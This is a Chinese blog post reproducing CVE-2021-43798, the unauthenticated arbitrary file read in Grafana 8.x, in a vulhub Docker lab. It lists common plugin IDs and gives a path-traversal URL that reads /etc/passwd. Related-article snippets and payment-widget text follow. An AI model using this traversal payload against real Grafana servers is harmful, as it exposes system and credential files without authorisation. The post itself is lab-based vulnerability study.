CVE-2021-43798Grafana 8.x任意文件读取漏洞 复现

最新推荐文章于 2024-05-11 15:38:36 发布
最新推荐文章于 2024-05-11 15:38:36 发布
阅读量807 收藏
点赞数
文章标签: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45715461/article/details/125752563
版权

1 漏洞信息

漏洞名称Grafana 8.x 任意文件读取漏洞
漏洞编号CVE-2021-43798
危害等级中危
CVSS评分5.0
漏洞类型中间件漏洞
漏洞厂商Grafana
漏洞组件Grafana
受影响版本Grafana 8.0.0 - 8.3.0
漏洞概述未授权的攻击者利用该漏洞,能够获取服务器敏感文件。

2 环境搭建

2.1 环境概述

  • Linux操作系统(vulhub)

2.2 搭建过程

进入到目标路径,拉取镜像

cd vulhub/grafana/CVE-2021-43798
docker-compose up -d

{width=“5.759722222222222in”
height=“0.5472222222222223in”}

查看容器信息,发现是3000端口

docker ps

{width=“5.759027777777778in”
height=“0.21805555555555556in”}

打开网页,搭建成功

{width=“5.759722222222222in”
height=“2.4993055555555554in”}

3 漏洞复现

在进行改漏洞的复现前我们需要先获取该网页一个已安装的插件id,比较常见的有:

alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text

我这里选用alertlist插件id来进行构造恶意的payload。

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd

{width=“5.763194444444444in”
height=“4.811111111111111in”}

4 修复建议

1.升级到最新版本

俺不想学习
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
Grafana任意文件读取漏洞CVE-2021-43798)
Bird&Bird
12-21 1631
目录1、漏洞描述2、影响版本3、环境搭建4、漏洞5、安全建议 1、漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日,国外安全研究人员披露Grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。 2、影响版本 Grafana 8.3.x < 8.3.1 Grafana 8.2.x < 8.2.7 Grafana 8.1.x &lt
Grafana任意文件读取漏洞(CVE-2021-43798)
小小猪的博客
12-24 2173
Grafana任意文件读取漏洞(CVE-2021-43798) 漏洞描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 漏洞影响范围: Grafana 8.0.0 - 8.3.0 环境搭建: 采用vulfocus靶场 地址 漏洞: ...
漏洞防范与应对:从发到修的全攻略】Prometheus Pushgateway推送网关 存在未授权访问漏洞 ,处理过程详解!!!
最新发布
大唐有趣的小胡.
05-11 1259
本文详细介绍了Prometheus Pushgateway推送网关存在的未授权访问漏洞及其处理过程。该漏洞允许未经授权的用户访问Pushgateway,可能导致敏感信息泄露或系统被恶意利用。文章首先分析了漏洞产生的原因,然后给出了具体的处理步骤,包括限制访问权限、更新配置文件、重启服务等。同时,强调了及时修漏洞的重要性,并提供了防范类似漏洞的建议。通过本文的指南,读者可以了解如何发并应对Prometheus Pushgateway推送网关的未授权访问漏洞,确保系统的安全性和稳定性。
grafana 目录遍历(CVE-2021-43798)漏洞【VULFOCUS靶场-中级】--拿flag的历程
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-26 1万+
漏洞名称: grafana 目录遍历 (CVE-2021-43798) 漏洞描述: Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7...
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞
Jietewang的博客
12-15 7975
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞 漏洞原理 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 攻击者可以通过将包含特殊目录便利字符序列(../)的特制HTTP请求发送到受影响的设备来利用此漏洞,成功利用该漏洞的攻击者可以在...
vulfocus靶场通关(目录遍历)
信安是不可或缺的一部分!
01-31 1943
该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。受影响的版本为 8.5.14 之前的版本、8.13.6 之前的 8.6.0 版本以及 8.16.1 之前的 8.14.0 版本。uWSGI是一款Web应用程序服务器,它实了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…
漏洞CVE-2021-43798 Grafana 8.x 插件模块目录穿越漏洞
m0_53121608的博客
07-16 232
漏洞CVE-2021-43798 Grafana 8.x 插件模块目录穿越漏洞
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
漏洞Grafana任意文件读取漏洞(CVE-2021-43798)
热门推荐
qq_45244158的博客
12-09 1万+
Grafana 任意文件读取漏洞(CVE-2021-43798)
CVE-2021-43798 Grafana任意文件读取
weixin_46137328的博客
01-09 1315
0x00 概述Grafana是一个完全开源的度量分析与可视化平台,可对来自各种各种数据源的数据进行查询、分析、可视化处理以及配置告警。Grafana读取文件接口存在未授权,且未对文件地址...
CVE-2021-43798——Grafana 未授权任意文件读取
LiBai'S BLOG
12-18 1万+
Grafana 未授权任意文件读取~
【vulhub系列】CVE-2021-43798 Grafana未授权任意文件读取
Wiofgb的博客
08-17 1124
记录一次CVE-2021-43798 Grafana未授权任意文件读取
漏洞Grafana任意文件读取CVE-2021-43798)
m0_52923241的博客
03-11 1161
只要是安装了任何一个插件就可以出任意文件读取,因为是plugins的问题。
Grafana 未授权任意文件读取漏洞(CVE-2021-43798)
m0_58596609的博客
12-27 2294
Grafana 未授权任意文件读取漏洞(CVE-2021-43798)
【2022年度悲报】-回望2022,展望2023
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-01 8232
我的2022年度总结,带你看看我的故事,也祝愿大家新年快乐。
cve-2021-43798
07-28
CVE-2021-43798是指Grafana中的未经授权的任意文件读取漏洞。攻击者可以利用这个漏洞读取系统上的敏感文件。\[1\] 为了利用这个漏洞,攻击者可以使用curl命令下载Grafana Enterprise 8.3.0版本的压缩包,并解压缩。\[2\]然后,可以使用提供的Python脚本exp.py来执行攻击。该脚本会尝试读取目标服务器上的/etc/passwd文件,以确认是否存在漏洞。\[3\] 需要注意的是,这个漏洞只会影响使用受影响版本的Grafana,并且需要攻击者能够与目标服务器建立连接才能利用漏洞。建议及时更新Grafana以修这个漏洞,并确保服务器的安全配置和访问控制措施得到有效实施。 #### 引用[.reference_title] - *1* [CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞](https://blog.csdn.net/Jietewang/article/details/121961312)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [漏洞分析|CVE-2021-43798 - Grafana文件读取漏洞](https://blog.csdn.net/weixin_42508548/article/details/122061449)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2021-43798——Grafana 未授权任意文件读取](https://blog.csdn.net/weixin_44309905/article/details/122008606)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值